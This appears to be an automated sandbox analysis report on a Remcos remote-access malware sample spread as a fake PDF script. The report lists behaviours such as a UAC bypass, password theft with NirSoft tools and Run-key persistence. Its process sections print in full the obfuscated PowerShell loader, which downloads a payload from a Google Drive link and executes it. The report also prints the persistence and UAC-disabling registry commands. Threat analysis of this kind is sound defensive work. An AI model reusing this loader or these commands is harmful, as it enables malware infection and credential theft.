Analysis Overview
SHA256
214b6045626bc92ec2f7994c1275a8e86268f3b2f81466cfedebe8fb233b5432
Threat Level: Known bad
The file 05112024_0056_03112024_SPP_14667098030794_8611971920pdf.zip was found to be: Known bad.
Malicious Activity Summary
Remcos family
Remcos
UAC bypass
NirSoft WebBrowserPassView
NirSoft MailPassView
Detected Nirsoft tools
Uses browser remote debugging
Blocklisted process makes network request
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Accesses Microsoft Outlook accounts
Adds Run key to start application
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Enumerates system info in registry
Modifies registry key
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-05 00:56
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-05 00:56
Reported
2024-11-05 01:01
Platform
win7-20240903-en
Max time kernel
300s
Max time network
120s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2168 wrote to memory of 2900 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2168 wrote to memory of 2900 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2168 wrote to memory of 2900 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SPP_14667098030794_8611971920·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Delepunkter Preeconomically Gybed #>;$backfisch='Unbedabbled';<#Kommuneplaner troldmandsorganisationens Modelune Hectocotylization Petrobrusian #>; function Physiotherapist($skvalpe){If ($host.DebuggerEnabled) {$Cathlins227++;}$Premious=$Scathed+$skvalpe.'Length' - $Cathlins227; for ( $Bulbochaete=4;$Bulbochaete -lt $Premious;$Bulbochaete+=5){$Kulturhistoriens218=$Bulbochaete;$Allergikere+=$skvalpe[$Bulbochaete];}$Allergikere;}function Airfares($Differentierbart){ . ($Frysediske) ($Differentierbart);}$Historiographies=Physiotherapist ' attMIn,qoTurnzDeaciPro lpol,lDam a Nyv/ Ent ';$Arcsine=Physiotherapist ' In TKu elBughsCon.1 N.n2Marg ';$belard='Sei,[ ,enn.odbE PorT Ski.HandSLa,eeDra rMaltv MegIFauncSympeRuddPbehaOA peISavaNSquiTBa bmSuppAMagtN MolaMacogTripE egyrLa r]Empy:Mira:.ruks Lf.eStrecGa.duForsrsl vi inkt riny MyePMoseRUnl OMistTJocoOExtrcGa tohardLDob.=Deli$UdkaABrlerTi scAnstsKiloIPrlunChisE A.a ';$Historiographies+=Physiotherapist 'B.ug5Isam.Knal0C mp F,r(A,elWFloki ian.agedMistoB hawReh,s re SammN El TKen ug n1N.za0Revi.Guat0Enfe;B ta BeerW Re imalhnCh c6Drip4 brs;P rs selvxTyks6Snoo4X,lo;Side PulmrApo vVult:Smel1 Kor3gran1 Fre.Udem0reco)Bagv HeidG nloeAlfacHulikH maofosf/ nde2Jagt0Medi1Du.c0A,st0 Sub1Solh0 aki1Bil, UkamFKbstiB,acrUndeePrecfTlleoPag x .id/Rens1Logi3Misb1R nh.Tnde0Jowl ';$Lkkerbiskenen=Physiotherapist 'KapruRotts DisEE gorWo b-Basta .aagekviEDatan DurTTre. ';$Parken=Physiotherapist 'B ndh ddit SvrtForgpProssPoki:Soun/Jinr/DitidUngarVindiPsorvSolveHerm.Kursg pshoUnfloNo rgCykelForhePlat.P,uvcmas oShabm Con/ SonuWisscForf?Un de.eckxRedipVenioSemirU.cotsece=No.ndMulto SkuwGam nUd nl isoIndbaKlasdSemi&Boosi.pirdSout=H,li1Gray-Skilv RevoEy,bx ehyB Te yUdlgw PedAKataA AnuwEff,-holdo ignhMani_Bl.pQBullv uaneDa.olA reEromaF Mo QS ej5Baby3MastpChe,6UnitLStigFBayovritz6Bas.x .tatTeen5Ula ';$Kalibreringerne=Physiotherapist 'Pren> Fi ';$Frysediske=Physiotherapist 'Sm giEfteE Kedxbrau ';$Urgency='Opmuntredes';$Bulbochaetenefficacity='\Boganmelderen.Flu';Airfares (Physiotherapist 'vedf$PresGForfL otoTempbJus,A MailDiaz:S ndI rueLLignL KryU auksSar,tUnr R ulhaB.smtMalaiAlacV ronTWar = Unc$ Ma EHistn AblvA,se:B,okALawypBetoP IndDVerrA annT gasaJenk+Sl,m$StanB Ki uG nilFletbBookONymfCTumoHHousA D.ie isptSegmeEvenN TypEAutofUndefSelei.ulicAlteAM.ddcImagISam.TBoerYVari ');Airfares (Physiotherapist ' Sam$Gongg H,slInteoDiabb Fora velTank:Squig orrAKonnRJagtD undeFarvnRegiICockZPercEBeausSmig= Tog$RamapSte,aSkraR letk Ba.EIntenIntr.PoetSeftePKor l Ru iUngeTBort( Non$MisokPa maAdfrL si I ForBFlusr ManeHaa RHorii,kuvNKondg.noweDelkRBjerNUbegeIndk)P rs ');Airfares (Physiotherapist $belard);$Parken=$gardenizes[0];$Bulbochaetentuitionalist=(Physiotherapist ' isi$Ag ag Th lSpisOfastbSkjoAM.llLbyba: MatF A bo Vu.RPumaK rivUSch,lOverN AspIHvidNHdtvg,haieHemiR incSChar=overNMereE SkjWUdfl- ornO Stvb T.nJJ.eseAnagcAttaTBe.r BoersNervYBranS SekTAl aESvenMUntu.EpidN Sa eAracT kl.EspeW onoe In bFlyec,etul ejiNon.EGraen SlgTSk l ');Airfares ($Bulbochaetentuitionalist);Airfares (Physiotherapist 'dulo$ExhaF rneoFoedrBa,dkHvepuGrael RepnBr.diPre n NilgCycleVi krops,s Bee.OranHDokue Om a,utbd,poteNo,mrSv gsPi s[None$Ob eLDybdk Stak Gr eSky.rEchabTilliNormsTelek .loe resn HygeFemhnSubc] B r= ind$PartHOut i Fl,sVenet UrkoOnd rAdj iKnneoBlungBecarTaxaaFllepCarmhSlutiBil.eClinsAgam ');$Dalrede=Physiotherapist 'Ind.$AeroFhairoInebrAdrekS rruAsbelBib nposiiIntenLobegDiseeBrusr nalsKeel. M.hDF rtoSkriw D,nnRef lill,oGrubaT,epd PerF CuliSupelUn ne.oll( vi$phaePPr,eaStrer Irrk OrteSpacnTria,Mana$Ret O.nbop F.drOvere GlatUngetAnaleOmk lBoghiRotogTerre IndsWine)Meni ';$Opretteliges=$illustrativt;Airfares (Physiotherapist 'Slim$TranG VaslMillo DamBarbeA.iabLSpi.:Aspim svaESocis,lumt UbrR GaaeShirtTeat=kuld(PreaTPoeme EpiSPolaTLejr- Anop C oaOpretTritHAcer Ba m$KumeoTv.lPCathRG.anEDgnvtG rlt andEEmbeLUnaiI StngSto ELandsF,rl)S ap ');while (!$Mestret) {Airfares (Physiotherapist ' Ke.$Mahug EdulOptioP,eub UndaPulvl ota: oncFTrieaZagrrMinivWhereSenafDoubaMer.sVegetBere=Su.p$ oltt Admr evou,aireRe.t ') ;Airfares $Dalrede;Airfares (Physiotherapist 'SemiSAan TMacrA ,ivrKan.tBu,n-BybiSO erLFldneMikeE treP o t S e4Chap ');Airfares (Physiotherapist 'Frit$ReapGFabulIne oE erBBr nabardl Sys:Al tM T neFortSE emtNatuRArche afsT Ar =Bogt(GyratBoxieMahaSdatatEks - SjkpRe da ReutBombH W r Sner$RkenoOve.P PriR yroEDandTSrskTRe reBullL f,riEbbegbagee eldsSta )Forl ') ;Airfares (Physiotherapist 'In e$Sig,gWaldL IndOFah,B uveA elvL V j:Breni T gNTrygtGusteUbesR KnoD.ecae KviPBalwaN ntrSubsTKvalMGi deVan nsongTPu vA bydL KolLOcc.Y ,ol=Phan$Vagag Foul anoFlleb SrgACruslisaf:StagSUndeyViruD L uV.llie PitnReg dDrivTCigaEAnk s.fso1S ff0 Men6S,mm+Un i+Smit%kard$BlokGPlasaPraiR BddDOrviE V,lNTageiMeroz VeneOpbySAspa.AgilC OptOspinU UndN U,tT ntr ') ;$Parken=$gardenizes[$Interdepartmentally];}$Monoprotic=290512;$Baadmotorer180=29973;Airfares (Physiotherapist 'V gt$ SulGJustLBhojoAsatB RasaSunsl.ead:BiscsAmtstSejuOPhlee PelT V ntP raeBrannSvrn lang=Amfi ignigkau EBesktJ,ra- S oc kovo ,veNFrakT ousePersnAn lt Dru Le.$fl,soSug P GalrOvereN.utttankTBrugeAn iLarbeIDkniG OuteKrigsSpli ');Airfares (Physiotherapist ' Sta$Sking an lProto SepbS bpa B.gl Ryk:brddN Samo PronBr ggAbeneBrocrKnosmBivui Nyln,ikeaFrdal nin Flos=semi Skat[ ireSSkr y O asOperthempe B.vmFeri. RegCUparoManinSkravKnkkeargerslugtCreb]T kk:Arti:AfstFA sir Cyko rysmdiveB BunaUdlgs RineSoir6Mors4MiddS Teot SkarUb tiReginAflngBeha(Litt$PneuSharstIndioM,gaeade,tIndstAntieAlkonS yd)Regi ');Airfares (Physiotherapist 'Vipe$ BrngHun LDundoSmaaBKontAFlerlremi:NedfUM non Recl,nteOAnlovMyceILathNRyttG Ph,lAno.y,nde icr= ex Glow[smaaSEmblyDeseS balT,idnePumpMLuft.O blTC,epeblanXSureTGoka.,lekeRemuNBlasCS agOMaskDS.liiDireNCrasgLune]Angu:Roge:AnviATeleSHmorCMe fISubbI ofa.BrusG Sp ePicoTDobbs SnitBr,iR eliI SitNHrmyg U g( Sol$ ElensporoKul n,yopGPr,cEFal.RWhalMUntaIStr.nS,sta wiel Sem)Weim ');Airfares (Physiotherapist ' Man$.fveGAkk l oruoGeniB SelA Z nlTieb:Preih DagEc ruA Va D nreQAflaU RedaUmagrAbriTKvadeS,leRD.rgiLuftNRo,sgT le=Head$LeatuDef.nfluvLBarso ProVsen.ITypeNSkotGSvinlBu dYS ud. orsNoncUtu.nbStabsSta,tUncoRMedeiGradNP etGMi i(Fil $NormmTeleoSockNR,ceo.ranp ArbrKvarOGravtTekniCaumcafsn,Dulc$Mrk BFre.A.nsoAPampd Ha mP ylOAppaTProdOEnphrUnireDompr and1 Tre8E go0tykm)Pibe ');Airfares $Headquartering;"
Network
Files
C:\Users\Admin\AppData\Local\Temp\CabA546.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2900-20-0x000007FEF558E000-0x000007FEF558F000-memory.dmp
memory/2900-21-0x000000001B6F0000-0x000000001B9D2000-memory.dmp
memory/2900-22-0x0000000002240000-0x0000000002248000-memory.dmp
memory/2900-23-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
memory/2900-26-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
memory/2900-25-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
memory/2900-24-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
memory/2900-27-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
memory/2900-28-0x000007FEF558E000-0x000007FEF558F000-memory.dmp
memory/2900-29-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
memory/2900-30-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
memory/2900-31-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
memory/2900-32-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
memory/2900-33-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-05 00:56
Reported
2024-11-05 01:01
Platform
win10v2004-20241007-en
Max time kernel
299s
Max time network
297s
Command Line
Signatures
Remcos
Remcos family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\msiexec.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Sirkeer% -windowstyle 1 $Oxidisings=(gp -Path 'HKCU:\\Software\\Runen\\').Serviceorganisationers;%Sirkeer% ($Oxidisings)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4128 set thread context of 2964 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4128 set thread context of 2196 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4128 set thread context of 3864 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SPP_14667098030794_8611971920·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Delepunkter Preeconomically Gybed #>;$backfisch='Unbedabbled';<#Kommuneplaner troldmandsorganisationens Modelune Hectocotylization Petrobrusian #>; function Physiotherapist($skvalpe){If ($host.DebuggerEnabled) {$Cathlins227++;}$Premious=$Scathed+$skvalpe.'Length' - $Cathlins227; for ( $Bulbochaete=4;$Bulbochaete -lt $Premious;$Bulbochaete+=5){$Kulturhistoriens218=$Bulbochaete;$Allergikere+=$skvalpe[$Bulbochaete];}$Allergikere;}function Airfares($Differentierbart){ . ($Frysediske) ($Differentierbart);}$Historiographies=Physiotherapist ' attMIn,qoTurnzDeaciPro lpol,lDam a Nyv/ Ent ';$Arcsine=Physiotherapist ' In TKu elBughsCon.1 N.n2Marg ';$belard='Sei,[ ,enn.odbE PorT Ski.HandSLa,eeDra rMaltv MegIFauncSympeRuddPbehaOA peISavaNSquiTBa bmSuppAMagtN MolaMacogTripE egyrLa r]Empy:Mira:.ruks Lf.eStrecGa.duForsrsl vi inkt riny MyePMoseRUnl OMistTJocoOExtrcGa tohardLDob.=Deli$UdkaABrlerTi scAnstsKiloIPrlunChisE A.a ';$Historiographies+=Physiotherapist 'B.ug5Isam.Knal0C mp F,r(A,elWFloki ian.agedMistoB hawReh,s re SammN El TKen ug n1N.za0Revi.Guat0Enfe;B ta BeerW Re imalhnCh c6Drip4 brs;P rs selvxTyks6Snoo4X,lo;Side PulmrApo vVult:Smel1 Kor3gran1 Fre.Udem0reco)Bagv HeidG nloeAlfacHulikH maofosf/ nde2Jagt0Medi1Du.c0A,st0 Sub1Solh0 aki1Bil, UkamFKbstiB,acrUndeePrecfTlleoPag x .id/Rens1Logi3Misb1R nh.Tnde0Jowl ';$Lkkerbiskenen=Physiotherapist 'KapruRotts DisEE gorWo b-Basta .aagekviEDatan DurTTre. ';$Parken=Physiotherapist 'B ndh ddit SvrtForgpProssPoki:Soun/Jinr/DitidUngarVindiPsorvSolveHerm.Kursg pshoUnfloNo rgCykelForhePlat.P,uvcmas oShabm Con/ SonuWisscForf?Un de.eckxRedipVenioSemirU.cotsece=No.ndMulto SkuwGam nUd nl isoIndbaKlasdSemi&Boosi.pirdSout=H,li1Gray-Skilv RevoEy,bx ehyB Te yUdlgw PedAKataA AnuwEff,-holdo ignhMani_Bl.pQBullv uaneDa.olA reEromaF Mo QS ej5Baby3MastpChe,6UnitLStigFBayovritz6Bas.x .tatTeen5Ula ';$Kalibreringerne=Physiotherapist 'Pren> Fi ';$Frysediske=Physiotherapist 'Sm giEfteE Kedxbrau ';$Urgency='Opmuntredes';$Bulbochaetenefficacity='\Boganmelderen.Flu';Airfares (Physiotherapist 'vedf$PresGForfL otoTempbJus,A MailDiaz:S ndI rueLLignL KryU auksSar,tUnr R ulhaB.smtMalaiAlacV ronTWar = Unc$ Ma EHistn AblvA,se:B,okALawypBetoP IndDVerrA annT gasaJenk+Sl,m$StanB Ki uG nilFletbBookONymfCTumoHHousA D.ie isptSegmeEvenN TypEAutofUndefSelei.ulicAlteAM.ddcImagISam.TBoerYVari ');Airfares (Physiotherapist ' Sam$Gongg H,slInteoDiabb Fora velTank:Squig orrAKonnRJagtD undeFarvnRegiICockZPercEBeausSmig= Tog$RamapSte,aSkraR letk Ba.EIntenIntr.PoetSeftePKor l Ru iUngeTBort( Non$MisokPa maAdfrL si I ForBFlusr ManeHaa RHorii,kuvNKondg.noweDelkRBjerNUbegeIndk)P rs ');Airfares (Physiotherapist $belard);$Parken=$gardenizes[0];$Bulbochaetentuitionalist=(Physiotherapist ' isi$Ag ag Th lSpisOfastbSkjoAM.llLbyba: MatF A bo Vu.RPumaK rivUSch,lOverN AspIHvidNHdtvg,haieHemiR incSChar=overNMereE SkjWUdfl- ornO Stvb T.nJJ.eseAnagcAttaTBe.r BoersNervYBranS SekTAl aESvenMUntu.EpidN Sa eAracT kl.EspeW onoe In bFlyec,etul ejiNon.EGraen SlgTSk l ');Airfares ($Bulbochaetentuitionalist);Airfares (Physiotherapist 'dulo$ExhaF rneoFoedrBa,dkHvepuGrael RepnBr.diPre n NilgCycleVi krops,s Bee.OranHDokue Om a,utbd,poteNo,mrSv gsPi s[None$Ob eLDybdk Stak Gr eSky.rEchabTilliNormsTelek .loe resn HygeFemhnSubc] B r= ind$PartHOut i Fl,sVenet UrkoOnd rAdj iKnneoBlungBecarTaxaaFllepCarmhSlutiBil.eClinsAgam ');$Dalrede=Physiotherapist 'Ind.$AeroFhairoInebrAdrekS rruAsbelBib nposiiIntenLobegDiseeBrusr nalsKeel. M.hDF rtoSkriw D,nnRef lill,oGrubaT,epd PerF CuliSupelUn ne.oll( vi$phaePPr,eaStrer Irrk OrteSpacnTria,Mana$Ret O.nbop F.drOvere GlatUngetAnaleOmk lBoghiRotogTerre IndsWine)Meni ';$Opretteliges=$illustrativt;Airfares (Physiotherapist 'Slim$TranG VaslMillo DamBarbeA.iabLSpi.:Aspim svaESocis,lumt UbrR GaaeShirtTeat=kuld(PreaTPoeme EpiSPolaTLejr- Anop C oaOpretTritHAcer Ba m$KumeoTv.lPCathRG.anEDgnvtG rlt andEEmbeLUnaiI StngSto ELandsF,rl)S ap ');while (!$Mestret) {Airfares (Physiotherapist ' Ke.$Mahug EdulOptioP,eub UndaPulvl ota: oncFTrieaZagrrMinivWhereSenafDoubaMer.sVegetBere=Su.p$ oltt Admr evou,aireRe.t ') ;Airfares $Dalrede;Airfares (Physiotherapist 'SemiSAan TMacrA ,ivrKan.tBu,n-BybiSO erLFldneMikeE treP o t S e4Chap ');Airfares (Physiotherapist 'Frit$ReapGFabulIne oE erBBr nabardl Sys:Al tM T neFortSE emtNatuRArche afsT Ar =Bogt(GyratBoxieMahaSdatatEks - SjkpRe da ReutBombH W r Sner$RkenoOve.P PriR yroEDandTSrskTRe reBullL f,riEbbegbagee eldsSta )Forl ') ;Airfares (Physiotherapist 'In e$Sig,gWaldL IndOFah,B uveA elvL V j:Breni T gNTrygtGusteUbesR KnoD.ecae KviPBalwaN ntrSubsTKvalMGi deVan nsongTPu vA bydL KolLOcc.Y ,ol=Phan$Vagag Foul anoFlleb SrgACruslisaf:StagSUndeyViruD L uV.llie PitnReg dDrivTCigaEAnk s.fso1S ff0 Men6S,mm+Un i+Smit%kard$BlokGPlasaPraiR BddDOrviE V,lNTageiMeroz VeneOpbySAspa.AgilC OptOspinU UndN U,tT ntr ') ;$Parken=$gardenizes[$Interdepartmentally];}$Monoprotic=290512;$Baadmotorer180=29973;Airfares (Physiotherapist 'V gt$ SulGJustLBhojoAsatB RasaSunsl.ead:BiscsAmtstSejuOPhlee PelT V ntP raeBrannSvrn lang=Amfi ignigkau EBesktJ,ra- S oc kovo ,veNFrakT ousePersnAn lt Dru Le.$fl,soSug P GalrOvereN.utttankTBrugeAn iLarbeIDkniG OuteKrigsSpli ');Airfares (Physiotherapist ' Sta$Sking an lProto SepbS bpa B.gl Ryk:brddN Samo PronBr ggAbeneBrocrKnosmBivui Nyln,ikeaFrdal nin Flos=semi Skat[ ireSSkr y O asOperthempe B.vmFeri. RegCUparoManinSkravKnkkeargerslugtCreb]T kk:Arti:AfstFA sir Cyko rysmdiveB BunaUdlgs RineSoir6Mors4MiddS Teot SkarUb tiReginAflngBeha(Litt$PneuSharstIndioM,gaeade,tIndstAntieAlkonS yd)Regi ');Airfares (Physiotherapist 'Vipe$ BrngHun LDundoSmaaBKontAFlerlremi:NedfUM non Recl,nteOAnlovMyceILathNRyttG Ph,lAno.y,nde icr= ex Glow[smaaSEmblyDeseS balT,idnePumpMLuft.O blTC,epeblanXSureTGoka.,lekeRemuNBlasCS agOMaskDS.liiDireNCrasgLune]Angu:Roge:AnviATeleSHmorCMe fISubbI ofa.BrusG Sp ePicoTDobbs SnitBr,iR eliI SitNHrmyg U g( Sol$ ElensporoKul n,yopGPr,cEFal.RWhalMUntaIStr.nS,sta wiel Sem)Weim ');Airfares 